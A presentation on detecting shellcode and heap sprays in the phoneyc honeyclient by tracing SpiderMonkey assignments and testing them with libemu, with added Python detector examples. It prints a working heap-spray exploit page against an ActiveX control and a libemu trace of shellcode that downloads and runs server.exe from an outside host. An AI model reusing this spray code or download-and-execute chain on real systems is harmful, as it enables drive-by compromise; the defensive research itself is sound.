shellcode and heapspray detection in phoneyc


Upload: z-chen

Post on 08-May-2015


Page 1: Shellcode and heapspray detection in phoneyc

phoneyc with libemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

Current Results

JoYAN

Shellcode and heapspray detection in phoneyc

Zhijie Chen1

1Honeynet Project Chinese Chapter

Honeynet Project on Google Summer of Code, 2009

Page 2: Shellcode and heapspray detection in phoneyc


Contents

1 Introduction to phoneyc

2 A Typical Web-Based Malware

3 Shellcode detection using Libemu

4 Tracing Mozilla Spidermonkey

  Basic Principles of Spidermonkey

5 Shellcode Detection in phoneyc

  Basic Idea

  Details

  Related Source files

  Implementation

6 Heapspray Detection

7 Current Results

Page 4: Shellcode and heapspray detection in phoneyc


Introduction to phoneyc

http://code.google.com/p/phoneyc/

A python honeyclient

Originally written by Jose Nazario.

To detect Web-based Malware

Page 6: Shellcode and heapspray detection in phoneyc


A Typical Heapspray Mal-javascript I

<body><script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
  style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+...(shellcode)"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
</script>
<SCRIPT language="javascript">
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;

Page 7: Shellcode and heapspray detection in phoneyc


A Typical Heapspray Mal-javascript II

memory = new Array();
for (x=0; x<100; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 1024) buffer+="\x05";
var ok="1111";
target.Register(ok,buffer);
</script>
</body>

Page 8: Shellcode and heapspray detection in phoneyc


Heap Status After Heapspray

| More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
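The r-value that the detector described in these slides inspects is the decoded form of the unescape() string in the sample page above, and getting the byte order right matters: each %uXXXX is one UTF-16 code unit, stored little-endian, so "%u7468" is the two bytes "ht" and not "th". The following Python is an added example, not code from phoneyc or from these slides. It decodes such a string into its memory image, splits that image into the NOP sled and the trailing payload from the "Heap Status After Heapspray" picture, and pulls printable strings out of the payload, which is how the download URL surfaces during triage. The input is constructed from the URL-bearing tail of the slide's own string behind a short sled; the slide elides the actual shellcode body, and it is not reproduced here.

```python
import re

# Constructed input: a short %u9090 sled followed by the URL-bearing tail of
# the slide's unescape() string. The slide's shellcode body is elided there
# and is not reproduced here.
SAMPLE_ESCAPED = ("%u9090%u9090%u9090%u9090"
                  "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65"
                  "%u6573%u7672%u7265%u652e%u6578%u0000")

NOP = 0x90
_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.S)


def js_unescape_to_bytes(escaped: str) -> bytes:
    """Decode an unescape() argument into the bytes the resulting JS string
    occupies in memory. A JS string is a sequence of 16-bit code units stored
    little-endian, so "%u9090" -> 90 90 and "%u7468" -> 68 74 ("ht"). %XX and
    literal characters each become one code unit as well (low byte, then 0x00
    for ASCII)."""
    out = bytearray()
    for m in _TOKEN.finditer(escaped):
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2) is not None:
            out += int(m.group(2), 16).to_bytes(2, "little")
        else:
            out += m.group(3).encode("utf-16-le")
    return bytes(out)


def sled_profile(image: bytes) -> dict:
    """Split a decoded block into the leading NOP sled and whatever follows
    it, i.e. the 'sled | shellcode' layout the slides draw for the sprayed
    heap."""
    i = 0
    while i < len(image) and image[i] == NOP:
        i += 1
    return {
        "sled_len": i,
        "payload_len": len(image) - i,
        "sled_ratio": (i / len(image)) if image else 0.0,
    }


def printable_strings(image: bytes, min_len: int = 6) -> list:
    """Runs of printable ASCII of at least min_len bytes. URLs and file names
    inside a payload only show up here once the byte order is right."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, image)]


def analyze(escaped: str) -> dict:
    """Decode one assignment r-value and summarise it the way an analyst
    would want to see it in a honeyclient log."""
    image = js_unescape_to_bytes(escaped)
    report = sled_profile(image)
    report["size"] = len(image)
    report["strings"] = printable_strings(image)
    return report


if __name__ == "__main__":
    print(analyze(SAMPLE_ESCAPED))
```

On the constructed input the report shows an 8-byte sled, a 28-byte payload and the single string http://1v1.name/server.exe, which is the same URL the libemu run in the results slides later recovers from the emulated URLDownloadToFile call.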

Page 9: Shellcode and heapspray detection in phoneyc


Detecting Shellcode/Heapspray

SC/HS Detecting Tool: How To Detect It?

Page 11: Shellcode and heapspray detection in phoneyc


Introduction to libemu

From its official site:

libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. Using libemu one can:

detect shellcodes

execute the shellcodes

profile shellcode behaviour

Using libemu to detect shellcode and heapspray in web-based malware: see "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks".

Page 12: Shellcode and heapspray detection in phoneyc


Detecting x86 Instructions

SC/HS Detecting Time: When To Detect It?

Page 14: Shellcode and heapspray detection in phoneyc


Introduction to spidermonkey

What is SpiderMonkey?

SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript (http://www.mozilla.org/js/spidermonkey/).

Page 15: Shellcode and heapspray detection in phoneyc


Basic Principles of Spidermonkey

All JavaScript sources are compiled into JS bytecodes.

An interpreter executes the bytecodes, performing a small, well-defined action for each one.

All JavaScript variables are stored as jsval.

Some values, such as strings, are stored as an "atom".

Page 17: Shellcode and heapspray detection in phoneyc


Basic Idea

Both the shellcode manipulation and the spraying of the fillblock involve assignments. So if we can interrupt SpiderMonkey at the interpretation of the bytecodes that perform an assignment and check their arguments and values for shellcode, the shellcode is detected immediately on its assignment.

Page 18: Shellcode and heapspray detection in phoneyc


Details I

The following JS code:

function a(){b="c"; var a = 0;}

is compiled into bytecodes like:

00000: bindname "b"
00003: string "c"
00006: setname "b"
00009: pop
00010: zero
00011: setvar 0
00014: pop
00015: stop

So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcode won't slip past!

Page 19: Shellcode and heapspray detection in phoneyc


Details

To do so, we need to:

Step trace the SpiderMonkey runtime.

Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) of all kinds of assignments. Unfortunately, different kinds of assignment compile to different bytecodes.

But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).

Page 20: Shellcode and heapspray detection in phoneyc


Related Source files to be used later

jsapi.h: Basic APIs for JavaScript execution.

jsdbgapi.h: Basic APIs for debugging SpiderMonkey.

jsopcode.tbl: All the JS opcodes (bytecodes).

jsinterp.c: You can find how each bytecode is interpreted here.

Page 21: Shellcode and heapspray detection in phoneyc


Implementation

Register a trace handler into SpiderMonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.

In the handler:

Use JS_GetTrapOpcode to get the current opcode (bytecode).

Use JS_FrameIterator to get the current runtime stack.

Check the r-value of the set* bytecodes on the top of the stack with libemu.

Dump the shellcode and alert.

Continue the execution.

Provide this traced JS virtual machine as a python module named honeyjs, so other parts of phoneyc can use it just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.

Page 24: Shellcode and heapspray detection in phoneyc


Basic Idea

Heapspray:

A myriad of NOP-like x86 instructions

Accumulating through a loop of assignments

Shellcode at the end of each sledge

Detection:

Now: a variable counter records the mal-assignments (assignments containing shellcode in the r-value).

In the future: entropy? The Nozzle way?
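As a worked model of the trace handler from the Implementation slide together with the assignment counter described here, the following Python is an added example; it is not phoneyc's honeyjs module and not SpiderMonkey's API. The real hook is JS_SetInterrupt with JS_GetTrapOpcode and JS_FrameIterator in C, and the real r-value check is libemu; this model replaces them with a small opcode table carrying an assumed JOF_SET value, a list of trace events, and a GetPC signature scan that stands in for libemu's emu_shellcode_test(). The trace is constructed to mirror the slides' sample page: one assignment of the shellcode, one of the sled block, and one hundred memory[x] = block + shellcode assignments; the constructed "shellcode" is only a call/pop GetPC prologue inside a short NOP sled and does nothing else. A per-r-value hit counter, as on the Detection bullet, turns the repeated hits into the "Potential heapspray sledge" alert seen in the results slides.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Assignment opcodes named on the slides (plus setelem for memory[x] = ...).
# In SpiderMonkey they all carry JOF_SET in jsopcode.h; the flag value here is
# assumed for this simulation, not taken from SpiderMonkey.
JOF_SET = 0x0100
OPCODE_FLAGS = {
    "bindname": 0, "string": 0, "pop": 0, "zero": 0, "stop": 0,
    "setname": JOF_SET, "setvar": JOF_SET, "setprop": JOF_SET,
    "setarg": JOF_SET, "setelem": JOF_SET,
}

# Stand-in for libemu. libemu finds shellcode with GetPC heuristics and then
# emulates it; this scan only does the cheap first part, matching two classic
# position-independent-code prologues, and is far weaker than libemu.
GETPC_SIGNATURES = [
    ("call/pop", re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]")),  # call $+5 ; pop r32
    ("fnstenv", re.compile(rb"\xd9\x74\x24\xf4")),                   # fnstenv [esp-0xc]
]


def getpc_test(buf: bytes) -> int:
    """Offset of the first GetPC candidate in buf, or -1 when there is none
    (the same return convention as libemu's emu_shellcode_test())."""
    best = -1
    for _name, sig in GETPC_SIGNATURES:
        m = sig.search(buf)
        if m and (best < 0 or m.start() < best):
            best = m.start()
    return best


@dataclass
class TraceEvent:
    """One interrupt callback: the opcode about to execute and, for set*
    opcodes, the r-value on top of the stack. bytes stand in for the UTF-16
    image of a JS string; other Python values stand in for other jsvals."""
    opcode: str
    rvalue: object = None


@dataclass
class HoneyJsTracer:
    spray_threshold: int = 50                       # hits of one r-value before a spray alert
    hits: dict = field(default_factory=dict)        # r-value id -> hit count
    detections: list = field(default_factory=list)  # (opcode, id, getpc offset, size)

    def on_interrupt(self, ev: TraceEvent) -> bool:
        """Trace handler, called at every bytecode step. Returns True when
        this step's r-value was flagged."""
        if not (OPCODE_FLAGS.get(ev.opcode, 0) & JOF_SET):
            return False                    # not an assignment: continue execution
        if not isinstance(ev.rvalue, (bytes, bytearray)):
            return False                    # only string r-values can hold shellcode
        image = bytes(ev.rvalue)
        off = getpc_test(image)
        if off < 0:
            return False
        # The slides key alerts by the jsval address; a content hash is used here.
        rid = hashlib.sha1(image).hexdigest()[:8]
        self.hits[rid] = self.hits.get(rid, 0) + 1
        self.detections.append((ev.opcode, rid, off, len(image)))
        return True

    def alerts(self) -> list:
        """Per-r-value verdicts in the spirit of the slides' [ALERT] lines."""
        out = []
        for rid, n in self.hits.items():
            kind = ("Shellcode & Potential heapspray sledge"
                    if n >= self.spray_threshold else "Shellcode Detected")
            out.append(f"[ALERT] {rid} -> {kind} HIT:{n}")
        return out


def constructed_trace() -> list:
    """Hand-built events mirroring the slides' sample page. The 'shellcode'
    is only a call/pop GetPC prologue inside a short NOP sled."""
    shellcode = b"\x90" * 8 + b"\xe8\x00\x00\x00\x00\x5b" + b"\x90" * 8
    block = b"\x90" * 0x400             # the sled, shrunk from the slide's 0x40000
    events = [
        TraceEvent("bindname"),
        TraceEvent("string"),
        TraceEvent("setname", shellcode),   # var shellcode = unescape(...)
        TraceEvent("setname", 20),          # var headersize = 20
        TraceEvent("setname", block),       # block = block + block + fillblock
    ]
    events += [TraceEvent("setelem", block + shellcode) for _ in range(100)]
    events.append(TraceEvent("stop"))
    return events


def run_demo(spray_threshold: int = 50) -> HoneyJsTracer:
    tracer = HoneyJsTracer(spray_threshold=spray_threshold)
    for ev in constructed_trace():
        tracer.on_interrupt(ev)
    return tracer


if __name__ == "__main__":
    for line in run_demo().alerts():
        print(line)
```

Running the demo produces two alerts, one "Shellcode Detected HIT:1" for the shellcode variable and one "Shellcode & Potential heapspray sledge HIT:100" for the sprayed array elements, while the pure-NOP block and the numeric assignment pass unflagged. The threshold is the tunable part: set it above the number of sprayed copies and the same trace degrades to two plain shellcode alerts, which is the trade-off the "entropy? the Nozzle way?" bullet is pointing at.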

Page 26: Shellcode and heapspray detection in phoneyc


A Run on ssreader_0day.html I

joyan@Jdeb:~/code/phoneyc$ sh go.sh
HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader_0day.html
[]
==> http://172.31.25.227/phoneyc/ssreader_0day.html
JS EVAL
Executing Javascript:
DEBUG: !!!SC DETECTED at 141847268=141847572 size:374
DEBUG: !!!SC DETECTED at 141847524=141847756 size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
...
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
SSReader Pdg2 Register method overflow
[ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
Runing shellcode... offset:248
DEBUG: Begin analyzing ...
DEBUG: download http://1v1.name/server.exe ->

Page 27: Shellcode and heapspray detection in phoneyc


A Run on ssreader_0day.html II

c:\WINDOWS\system32\a.exe
...
URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
Done
[ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
[ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT:100
VBS EVAL
IFRAMES []
HREFS []
FRAMES []
IMAGES []

Page 28: Shellcode and heapspray detection in phoneyc


Analysis of The Shellcode using libemu I

FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x0041710c => = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x00417120 => = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x00417128 => = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 =>

Page 29: Shellcode and heapspray detection in phoneyc


Analysis of The Shellcode using libemu II

    none;
    LPCSTR lpProcName = 0x00417133 => = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
    LPCTSTR lpFileName = 0x00417140 => = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7df20000 => none;
    LPCSTR lpProcName = 0x00417147 => = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
    LPTSTR lpBuffer = 0x0012fe5f => none;
    UINT uSize = 32;
) = 19;
HRESULT URLDownloadToFile (

Page 30: Shellcode and heapspray detection in phoneyc


Analysis of The Shellcode using libemu III

    LPUNKNOWN pCaller = 0x00000000 => none;
    LPCTSTR szURL = 0x0041715a => = "http://1v1.name/server.exe";
    LPCTSTR szFileName = 0x0012fe5f => = "c:\WINDOWS\system32\a.exe";
    DWORD dwReserved = 0;
    LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
    LPCSTR lpCmdLine = 0x0012fe58 => = "cmd /c c:\WINDOWS\system32\a.exe";
    UINT uCmdShow = 0;
) = 32;

Page 31: Shellcode and heapspray detection in phoneyc


Thank you!